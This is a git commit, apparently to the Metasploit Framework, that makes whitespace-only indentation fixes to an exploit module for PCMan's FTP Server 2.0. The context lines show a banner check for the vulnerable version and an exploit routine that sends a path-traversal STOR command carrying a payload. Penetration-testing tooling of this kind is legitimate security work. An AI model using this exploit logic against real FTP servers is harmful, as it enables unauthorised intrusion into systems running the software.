Added minor indentation updates

bug/bundler_fix
Rick Flores (nanotechz9l) 2013-09-18 12:12:35 -07:00
parent db8881966e
commit 766e96510d
1 changed files with 2 additions and 2 deletions

View File

@ -60,7 +60,7 @@ def check
if (banner =~ /220 PCMan's FTP Server 2\.0/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
return Exploit::CheckCode::Safe
end
def exploit
@ -75,5 +75,5 @@ def exploit
send_cmd( ["STOR", "/../" + sploit], false )
disconnect
end
end
end